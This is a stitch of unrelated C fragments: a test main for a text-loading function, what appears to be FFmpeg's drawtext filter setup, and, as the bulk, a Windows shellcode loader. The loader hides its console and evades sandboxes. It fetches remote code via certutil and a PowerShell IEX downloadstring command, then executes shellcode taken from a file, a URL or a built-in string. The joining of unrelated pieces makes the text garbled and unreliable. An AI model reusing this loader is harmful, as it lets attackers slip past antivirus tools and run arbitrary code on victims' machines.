int main (int argc, char *argv[])
{
char **str;
int n, i;
if (argc != 2) error1 ("usage: load_textfile filename\n");
n = load_textfile (argv[1], &str);
if (n <= 0) error1 ("cannot load %s\n", argv[1]);
warning1 ("loaded %d lines from %s\n", n, argv[1]);
for (i=0; i<n; i++)
printf ("%4d. [%s]\n", i, str[i]);
return 0;
}
static av_cold int init(AVFilterContext *ctx)
{
int err;
DrawTextContext *s = ctx->priv;
Glyph *glyph;
if (!s->fontfile && !CONFIG_LIBFONTCONFIG) {
av_log(ctx, AV_LOG_ERROR, "No font filename provided\n");
return AVERROR(EINVAL);
}
if (s->textfile) {
if (s->text) {
av_log(ctx, AV_LOG_ERROR,
"Both text and text file provided. Please provide only one\n");
return AVERROR(EINVAL);
}
if ((err = load_textfile(ctx)) < 0)
return err;
}
if (s->reload && !s->textfile)
av_log(ctx, AV_LOG_WARNING, "No file to reload\n");
if (s->tc_opt_string) {
int ret = av_timecode_init_from_string(&s->tc, s->tc_rate,
s->tc_opt_string, ctx);
if (ret < 0)
return ret;
if (s->tc24hmax)
s->tc.flags |= AV_TIMECODE_FLAG_24HOURSMAX;
if (!s->text)
s->text = av_strdup("");
}
if (!s->text) {
av_log(ctx, AV_LOG_ERROR,
"Either text, a valid file or a timecode must be provided\n");
return AVERROR(EINVAL);
}
#if CONFIG_LIBFRIBIDI
if (s->text_shaping)
if ((err = shape_text(ctx)) < 0)
return err;
#endif
if ((err = FT_Init_FreeType(&(s->library)))) {
av_log(ctx, AV_LOG_ERROR,
"Could not load FreeType: %s\n", FT_ERRMSG(err));
return AVERROR(EINVAL);
}
err = load_font(ctx);
if (err)
return err;
if (!s->fontsize)
s->fontsize = 16;
if ((err = FT_Set_Pixel_Sizes(s->face, 0, s->fontsize))) {
av_log(ctx, AV_LOG_ERROR, "Could not set font size to %d pixels: %s\n",
s->fontsize, FT_ERRMSG(err));
return AVERROR(EINVAL);
}
if (s->borderw) {
if (FT_Stroker_New(s->library, &s->stroker)) {
av_log(ctx, AV_LOG_ERROR, "Coult not init FT stroker\n");
return AVERROR_EXTERNAL;
}
FT_Stroker_Set(s->stroker, s->borderw << 6, FT_STROKER_LINECAP_ROUND,
FT_STROKER_LINEJOIN_ROUND, 0);
}
s->use_kerning = FT_HAS_KERNING(s->face);
/* load the fallback glyph with code 0 */
load_glyph(ctx, NULL, 0);
/* set the tabsize in pixels */
if ((err = load_glyph(ctx, &glyph, ' ')) < 0) {
av_log(ctx, AV_LOG_ERROR, "Could not set tabsize.\n");
return err;
}
s->tabsize *= glyph->advance;
if (s->exp_mode == EXP_STRFTIME &&
(strchr(s->text, '%') || strchr(s->text, '\\')))
av_log(ctx, AV_LOG_WARNING, "expansion=strftime is deprecated.\n");
av_bprint_init(&s->expanded_text, 0, AV_BPRINT_SIZE_UNLIMITED);
av_bprint_init(&s->expanded_fontcolor, 0, AV_BPRINT_SIZE_UNLIMITED);
return 0;
}
int main (int argc, char **argv)
{
#ifdef QUIET
ShowWindow(GetConsoleWindow(), SW_HIDE);
#endif
char *fvalue = NULL;
char *uvalue = NULL;
int index;
int c;
opterr = 0;
// do evading here with fopen technique
#ifdef SANDBOX_FOPEN
#ifdef PRINT_DEBUG
printf("use fopen sandbox escape\n");
#endif
FILE *fp = fopen("c:\\windows\\system.ini", "rb");
if (fp == NULL)
return 0;
fclose(fp);
#endif
//evading with gethostbyname technique
#ifdef KVALUE
#ifdef PRINT_DEBUG
printf("use gethostbyname sandbox evasion\n");
#endif
struct hostent *hp = gethostbyname(KVALUE);
if (hp != NULL)
exit(0);
#endif
//#if defined(DOWNLOADCERTUTIL) || defined(DOWNLOADPOWERSHELL)
//download a file and write to disk
#ifdef DOWNLOADCERTUTIL
char download[500]; //how not to do it...
sprintf(download,"certutil.exe -urlcache -split -f %s",argv[2]);
#ifdef PRINT_DEBUG
printf("url: %s\n", download);
#endif
system(download);
#ifdef PRINT_DEBUG
printf("download done\n");
#endif
#endif
#ifdef DOWNLOADPOWERSHELL
char download[500];
sprintf(download,"powershell.exe \"IEX ((new-object net.webclient).downloadstring('%s'))\"",argv[2]);
#ifdef PRINT_DEBUG
printf("url: %s\n", download);
#endif
system(download);
#endif
#ifdef LVALUE
fvalue=argv[1];
#endif
#ifdef PRINT_DEBUG
printf ("fvalue = %s ", fvalue);
printf ("uvalue = %s \n", uvalue);
for (index = optind; index < argc; index++)
printf ("Non-option argument %s\n", argv[index]);
#endif
// compute #defines from defs.h
#ifdef FVALUE
int size = strlen(FVALUE);
fvalue=(char*)malloc(size);
strcpy(fvalue,FVALUE);
#endif
#ifdef UVALUE
int size = strlen(UVALUE);
uvalue=(char*)malloc(size);
strcpy(uvalue,UVALUE);
#endif
// exec shellcode from a given file or from defs.h
if (fvalue)
{
unsigned char *buffer;
unsigned char *shellcode;
int size;
//#ifndef FVALUE
#ifdef LVALUE
#ifdef PRINT_DEBUG
printf("exec shellcode from file\n");
#endif
size = get_filesize(fvalue);
buffer = load_textfile(fvalue, buffer, size);
#endif
#ifdef FVALUE
size = strlen (FVALUE);
buffer = FVALUE;
#endif
#ifdef ENCRYPT
#ifdef PRINT_DEBUG
printf ("size %d\n",size);
//printf ("%s\n",FVALUE);
printf("exec shellcode with decode_shellcode\n");
#endif
shellcode = decode_shellcode(buffer,shellcode,size);
#endif
#ifndef ENCRYPT
#ifdef LVALUE
unsigned char *buf = buffer; //that does the trick, although not nice. Needed for raw sc execution with -l
#endif
#ifndef ASCIIMSF
#ifndef DOWNLOADEXECSC
#ifdef PRINT_DEBUG
printf("exec shellcode without decode_shellcode\n");
#endif
shellcode = buf;
#endif
#endif
#endif
#ifndef X64
#ifndef ASCIIMSF
exec_shellcode(shellcode);
#endif
#ifdef ASCIIMSF
exec_shellcode_ASCIIMSF(shellcode);
#endif
#endif
#ifdef X64
exec_shellcode64(shellcode);
#endif
}
// exec from url
#ifdef UVALUE
else if (uvalue)
{
#ifdef PRINT_DEBUG
printf("exec shellcode from url\n");
#endif
char *sh_filename;
sh_filename = ie_download(uvalue, sh_filename);
int x=strlen(sh_filename);
#ifdef PRINT_DEBUG
printf("\n\n%d\n\n", x);
#endif
unsigned char *buffer;
unsigned char *shellcode;
int size = get_filesize(sh_filename);
buffer = load_textfile(sh_filename, buffer, size);
#ifdef ENCRYPT
shellcode = decode_shellcode(buffer,shellcode,size);
#else
shellcode = buf;
#endif
#ifndef X64
exec_shellcode(shellcode);
#endif
#ifdef X64
exec_shellcode64(shellcode);
#endif
}
#endif
#ifdef DOWNLOADEXECSC
unsigned char *shellcode = downloadshellcode(argv[1]);
#ifndef X64
exec_shellcode(shellcode);
#endif
#ifdef X64
exec_shellcode64(shellcode);
#endif
#endif
return 0;
}
// return pointer to the filename
char* ie_download(char* string, char* sh_filename)
{
char ie[500];
GetEnvironmentVariable("PROGRAMFILES",ie,100);
strcat(ie,"\\Internet Explorer\\iexplore.exe");
ShellExecute(0, "open", ie , string, NULL, SW_SHOWDEFAULT);
// wait a little until the file is loaded
Sleep(8000);
// get the filename to search format in the ie temp directory
char delimiter[] = "/";
char *ptr;
char *fname;
ptr = strtok(string, delimiter);
while(ptr != NULL)
{
fname = ptr;
ptr = strtok(NULL, delimiter);
}
#ifdef PRINT_DEBUG
printf("ie_download, filename: %s\n", fname);
#endif
// split the filename
char delimiter2[] = ".";
char *sname;
ptr = strtok(fname, delimiter2);
sname = ptr;
ptr = strtok(NULL, delimiter2);
#ifdef PRINT_DEBUG
printf("ie_download, name to search for: %s\n", sname);
#endif
// search for the file in user profile
// build searchstring
char tmp[150];
char tmp_home[150];
GetEnvironmentVariable ("USERPROFILE",tmp_home,150);
GetEnvironmentVariable ("TEMP",tmp,150);
tmp [ strlen(tmp) - 5 ] = 0x0;
//printf("\n\n%s\n\n",tmp);
char searchstring[500] = "/C ";
strncat (searchstring,tmp_home,1);
strcat (searchstring,": && cd \"");
strcat (searchstring,tmp);
strcat (searchstring,"\" && dir . /s /b | find \"");
strcat (searchstring,sname);
strcat (searchstring,"\" > \"");
strcat (searchstring,tmp_home);
strcat (searchstring,"\\shellcodefile.txt\"");
#ifdef PRINT_DEBUG
printf ("ie_download, searchstring: %s\n", searchstring);
#endif
// build & execute cmd
char cmd[500];
GetEnvironmentVariable ("WINDIR",cmd,500);
strcat (cmd,"\\system32\\cmd.exe");
ShellExecute (0, "open", "cmd.exe" , searchstring, NULL, SW_SHOWDEFAULT);
//now read the directory + filename from the textfile
char dirfile[500] = {0};
strcat (dirfile, tmp_home);
strcat (dirfile, "\\shellcodefile.txt");
//char *sh_filename;
int size_sh_filename=0;
int counter = 0;
while(size_sh_filename==0 && counter <= 1000)
{
size_sh_filename = get_filesize (dirfile);
Sleep(500);
counter++;
}
sh_filename = load_textfile (dirfile, sh_filename, size_sh_filename);
// there is always emtpy space at the end of the file -> delete that
sh_filename[size_sh_filename-2]=0x0;
#ifdef PRINT_DEBUG
printf ("ie_download, sh_filename: >>>%s<<<, size: %d\ntest\n", sh_filename, size_sh_filename);
#endif
return sh_filename;
}
